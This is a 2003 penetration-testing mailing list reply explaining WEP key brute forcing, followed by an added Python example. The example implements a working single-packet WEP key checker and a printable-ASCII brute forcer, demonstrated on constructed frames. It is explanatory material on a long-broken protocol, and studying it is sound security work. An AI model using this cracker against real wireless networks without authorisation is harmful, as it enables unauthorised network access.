Re: V/Scan for Wireless LANs

From: Nicolas RUFF (lists) (ruff.lists_at_edelweb.fr)
Date: 07/21/03

    Date: Mon, 21 Jul 2003 11:40:44 +0200
    To: pen-test@securityfocus.com
    
    

    > There are some tools that will work to try to find a WEP key but they require a lot of data and time. They exploit known vulnerabilities in the WEP algorithm to find the keys. However it could take as much as 500 meg of data. I don't have the links handy. Sorry.
    > As far as brute forcing: ok idea but not very doable. To iterate through all combinations would be 2^128 possibilities, which gets you to about 3.4028236692093846346337460743177e+38 possible combinations. If you assumed you could do 1 per second - which would be tough if you wait for DHCP to respond - it would take you 10790283070806014188970529154990 years to get through all the combinations. That's a long time. :) If somebody could check my math that would be great.

    Hello,

    Slight mistake here: the first 24 bits of the key are random (sometimes
    incremental, but most vendors have fixed this by now), but transmitted
    inside the packet (this is called the Initialisation Vector - IV), whereas
    the last 40 / 104 bits are derived from one of the WEP keys (since the
    system might use up to 4 WEP keys).

    2^40 = 1099511627776
    2^104 = 20282409603651670423947251286016

    Since RC4 is a fast algorithm, my P4 1.7GHz processor can check around
    25,000 k/s, so I guess you can walk through a 40-bit keyspace in a couple
    of weeks if you have a cluster of 20 to 30 P4 2.5GHz computers.

    There is also a trick that can save you time: some vendors derive the
    WEP key directly from the ASCII passphrase - that is why you sometimes
    have to give 5-character or 13-character only passphrases. In this case
    you only have to check the ASCII printable character range. I
    successfully managed to crack a 64-bit WEP key using a *single* packet
    within hours using this trick. However I never tried on 128-bit WEP keys.

    Regards,
    - Nicolas RUFF
    -----------------------------------
    Security Consultant
    EdelWeb (http://www.edelweb.fr/)
    Mail : nicolas.ruff@edelweb.fr
    -----------------------------------

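A worked example, added here and not part of Nicolas's post or of the thread: it models the WEP frame body the way the post describes it (a 24-bit IV sent in clear, a key-index byte selecting one of up to four keys, then RC4 keyed with IV||key over data||ICV), checks a candidate key against a single captured packet by verifying the ICV, and restricts the brute-force alphabet the way the passphrase-as-key trick allows. Everything here is assumed or constructed: the sample frames are built in the code, the demo search alphabet is digits only so the run finishes in seconds (the real printable-ASCII space of 95^5 keys is computed for comparison), and the LLC/SNAP first-byte filter plus the second-frame confirmation are practitioner additions that the post does not mention.

```python
"""Single-packet WEP key check and restricted-alphabet brute force.

Added example, not code from the original post. Frame body model:
    IV(3) || key-id(1) || RC4_{IV||key}(data || ICV), ICV = CRC-32(data)
Assumes the 40-bit key is the 5-character ASCII passphrase used verbatim.
"""
import itertools
import struct
import zlib
from typing import List, Optional

# Plaintext of a WEP data frame starts with the LLC/SNAP header; its first
# byte (0xAA) is known plaintext, so a wrong key is usually rejected after
# decrypting one byte instead of the whole frame.
LLC_SNAP = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00])
PRINTABLE = bytes(range(0x20, 0x7F))  # the 95 printable ASCII characters


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling on `key`, then XOR keystream over `data`."""
    s = list(range(256))
    j = 0
    klen = len(key)
    for i in range(256):
        j = (j + s[i] + key[i % klen]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray(len(data))
    i = j = 0
    for n, c in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = c ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(iv: bytes, key_id: int, key: bytes, data: bytes) -> bytes:
    """Build a protected frame body: IV || key-id byte || RC4(data || ICV)."""
    assert len(iv) == 3 and 0 <= key_id <= 3
    return iv + bytes([key_id << 6]) + rc4(iv + key, data + icv(data))


def wep_try_key(frame: bytes, key: bytes) -> Optional[bytes]:
    """Return the plaintext if `key` decrypts `frame` to a valid ICV, else None."""
    iv, body = frame[:3], frame[4:]  # IV is sent in clear; skip key-id byte
    if rc4(iv + key, body[:1]) != LLC_SNAP[:1]:  # cheap known-plaintext reject
        return None
    plain = rc4(iv + key, body)
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


def brute_force(frames: List[bytes], alphabet: bytes, key_len: int) -> Optional[bytes]:
    """Exhaust alphabet^key_len; a candidate must validate on every frame.

    One frame gives a 1-in-2^32 false-positive chance per surviving
    candidate, so a second captured frame is used to confirm a hit.
    """
    for cand in itertools.product(alphabet, repeat=key_len):
        key = bytes(cand)
        if all(wep_try_key(f, key) is not None for f in frames):
            return key
    return None


def keyspace(alphabet_size: int, key_len: int) -> int:
    """Number of candidate keys for a given alphabet and key length."""
    return alphabet_size ** key_len


def years_to_exhaust(space: int, keys_per_second: float) -> float:
    """Worst-case wall-clock years to try every key at a given rate."""
    return space / keys_per_second / (365 * 24 * 3600)


# Constructed sample: two frames under one hypothetical 40-bit key. The demo
# alphabet is digits only (an assumption) so the search completes quickly.
DEMO_KEY = b"01234"
DEMO_ALPHABET = b"0123456789"
DEMO_FRAMES = [
    wep_encrypt(b"\x03\xff\x01", 0, DEMO_KEY, LLC_SNAP + b"\x08\x00E\x00\x00\x14ping"),
    wep_encrypt(b"\x04\x00\x02", 0, DEMO_KEY, LLC_SNAP + b"\x08\x06\x00\x01\x08\x00arp"),
]


def demo() -> Optional[bytes]:
    """Recover DEMO_KEY from the two constructed frames."""
    return brute_force(DEMO_FRAMES, DEMO_ALPHABET, len(DEMO_KEY))


if __name__ == "__main__":
    print("2^40 raw keys      :", keyspace(2, 40))
    print("95^5 ASCII keys    :", keyspace(len(PRINTABLE), 5))
    print("years at 25k key/s :", round(years_to_exhaust(keyspace(2, 40), 25_000), 2))
    print("recovered key      :", demo())
```

The first-byte filter means a wrong key costs one RC4 key schedule plus one keystream byte; only about 1 in 256 candidates reach the full decrypt and CRC check, which is what makes a single captured packet enough to test a key. Restricting the alphabet to printable ASCII shrinks the 40-bit space from 2^40 to 95^5 (a factor of roughly 142), and a 104-bit key used as a 13-character passphrase shrinks from 2^104 to 95^13 in the same way.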

